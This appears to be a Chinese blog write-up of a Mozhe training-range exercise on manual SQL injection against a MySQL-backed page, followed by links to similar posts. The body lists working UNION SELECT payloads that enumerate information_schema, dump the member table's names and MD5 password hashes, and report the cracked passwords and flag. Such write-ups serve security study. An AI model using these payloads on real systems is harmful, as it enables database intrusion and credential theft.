墨者靶场-SQL手工注入漏洞测试(MySQL数据库)

已于 2022-03-08 11:02:00 修改
阅读量4.9k 收藏 1
点赞数
文章标签: SQL注入 数据库 信息泄露 安全漏洞 加密
于 2022-03-08 11:01:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42730900/article/details/123348325
版权

在这里插入图片描述

order by :4
测试回显位置:?id=-1 union select 1,2,3,4
结果:2和3回显
version():5.7.22-0ubuntu0.16.04.1
database():mozhe_Discuz_StormGroup
获取表名
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
表名:
StormGroup_member,notice
获取列名:
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’
列名:
id,name,password,status
获取数据:
?id=-1 union select 1,name,password,4 from StormGroup_member
数据:
mozhe 356f589a7df439f6f744ff19bb8092c0
MD5解密:dsan13
用户密码不对
再次尝试:
?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member
数据:
356f589a7df439f6f744ff19bb8092c0,66b2615a0da6ab2fbc7f13e83246336d
第二个解密得:413648
登录获得KEY:mozhe478912e98a24baf440d8c9ab730

N0rm4
关注
B站小迪安全笔记第12天-SQL注入之简要注入
m0_61530426的博客
07-20 684
B站小迪安全笔记
数据库注入漏洞线上靶场练习(mozhe)
caption88的博客
03-31 1575
今天练习了墨者的线上数据库漏洞手工注入(别问为什么,问就是简单,我可以做)。注:没有钱所以只做了几个,有钱的可以全部做完。 在你们去练习的前面我需要普及一些关于数据库的知识:第一点 数据库分为关系数据库和非关系数据库,两者代表(在我的印象里面的代表)关系型.Oracle,mysql,sqlserver,Access 非关系.MongoDB。两者的主要区别就是:https://blog.csdn....
零基础学习手工SQL注入
weixin_34110749的博客
06-07 341
SQL注入介绍SQL注入,其实就是用户浏览器提交的变量内容,应用程序(代码可能是asp、aspx、php、jsp等)对浏览器提交过来的数据未过滤,直接去数据库查询,导致把数据库里面其他内容(如管理账户和密码)查询返回到页面上。先看个《墨者学院故事会》的一个小故事:某个镇子里,银行保险柜做为一个公共区域帮居民存储贵重物品,为了防止错拿、多拿他人物品,银行规定:限制每人每次只能带一把开自己保险柜的钥匙...
SQL手工注入漏洞测试(MySQL数据库)解题思路小记
Routine_limon的博客
07-05 3012
靶环境:Nginx+PHP+MySQL(题目源自墨者学院) 解题目标: 手工进行SQL注入测试,获取管理密码登录。 解题思路: ①寻找sql注入点: 尝试从登陆表单注入: 结果: 后台存在密码账号验证,无法通过此处进行注入。 通过url进行注入: 发现注入点,开始进行sql注入。 ②注入sql 查询表的字段列数: 利用order by 函数对表的字段列数进行尝试,对于列数较多的表,建议使用二...
墨者21道
帅醉了的博客
08-28 945
1.1.1.uWSGI 漏洞复现(CVE-2018-7490) 测试详情 查找CVE-2018-7490漏洞,此漏洞构造…%2f可以访问任意文件,目录遍历,在key.txt前面多添加/…%2f…%2f…%2f…%2就可以得到key 1.1.2.Webmin未经身份验证的远程代码执行 测试详情 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 受影响的版本:Webmin<=1.920 抓包 修改包 第一步,修改
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3962
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者靶场SQL手工注入漏洞测试(MySQL数据库)
weixin_46694260的博客
03-23 7293
0x00 前言 学SQL注入也有一段时间了,找了一个在线靶场,这个题目基本上学会最基本的注入原理和方法都能拿下,废话就不多说了,直接来演示吧~菜鸟渗透,大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 ...
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2275
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
sql注入(2) 墨者学院之SQL手工注入漏洞测试MySQL数据库-字符型)
c10udz的博客
04-12 4172
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)操作分析
YRYUNO_1的博客
02-20 193
墨者学院的SQL手工注入漏洞测试(MySQL数据库)题目进行破解。
记录一次SQL注入
qq_43933657的博客
07-08 506
寻找注入点 -u : 指定目标URL,sql注入点 python sqlmap.py -u http://43.247.91.228:81/login.php 输出: ___ __H__ ___ ___[.]_____ ___ ___ {1.4.7.2#dev} |_ -| . ["] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1233
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
SQL手工注入漏洞测试(MySQL数据库)
海纳百川
05-07 2296
文章目录一、进入靶场二、在公告处发现注入点三、确定注入格式四、确定字段数五、确定显示字段六、查询数据库名字和版本七、查询其它数据库名称八、查询数据库表名九、查询表中字段名十、查询用户信息十一、登陆成功 题目信息: 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧 ...
mysql安全无密码登录_技术分享 | 安全地无密码登录 MySQL
weixin_39650745的博客
01-20 144
有人说最好的密码就是你不用记忆的。auth_socket 插件和 MariaDB 的 unix_socket 让这种想法在 MySQL 上变成可能。这两个插件虽然不是新发布,但在 MariaDB 10.4 上 unix_socket 已经默认安装,并且是身份验证方法之一。插件的安装和使用如上所述,这不是新功能,即使使用 Debian 团队维护的 .deb 安装包安装 MySQL,也会创建 root...
mysql安全无密码登录,安全地无密码登录 MySQL-爱可生
weixin_31879641的博客
03-23 184
原标题:安全地无密码登录 MySQL-爱可生 有人说最好的密码就是你不用记忆的。auth_socket 插件和 MariaDB 的 unix_socket 让这种想法在 MySQL 上变成可能。auth_socket:https://dev.mysql.com/doc/refman/8.0/en/socket-pluggable-authentication.htmlunix_socket:htt...
mysql5.7的高危漏洞_应用CVE: 最新的Mysql高危漏洞介绍
Aplumage的专栏
08-16 7202
MySQL官方最近做了一个大的安全漏洞补丁,修复了25 个安全漏洞,关于这些漏洞细节官方和媒体目前为止还有比较少的介绍和分析文章。在此笔者搜集下相关的详细,从邮件讨论组趴到一些细节信息,在此介绍一下几个比较重要的、高危的漏洞。包括CVE-2018-2696,CVE-2018-2591和CVE-2018-2562。 CVE-2018-2696 mysql: sha256_password 认证长密码拒绝式攻击 该漏洞源于MySQL sha256_password认证插件,该插件没有对认证密码的长度进行限制
MySQL中几种常见的行格式
weixin_45923633的博客
09-13 483
动态格式会根据行中数据的实际大小动态地调整行的存储方式。如果行中的某个字段是变长的,那么这个字段的实际数据将被存储在行的末尾,而不会在行的开头占用固定的空间。这种格式适用于所有列都是固定长度的情况,可以提供最快的访问速度,但可能会浪费存储空间。:紧凑格式试图减少内部碎片,使得行的平均大小变小,从而在一个数据页中可以存储更多的行。:页面格式是一种较新的行存储格式,它旨在提高大表的访问性能和存储效率。是用来指定表中行的存储格式的属性。不同的行格式会影响数据的存储方式,进而影响存储空间的使用效率和访问性能。
MySQL练手题--体育馆的人流量(困难)
最新发布
weixin_66919047的博客
09-15 586
此题稍微微有一点难度,如果看不明白可以对题目进行分解分析,分析出一步之后再接下一步来查询,题目已经要求人数大于等于100且id连续三行,就可以先筛选出大于等于100 的id 然后排序求差 差值相等的均为id连续的 ,最后筛选差值总数大于等于3 的,便出来了最后结果;
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值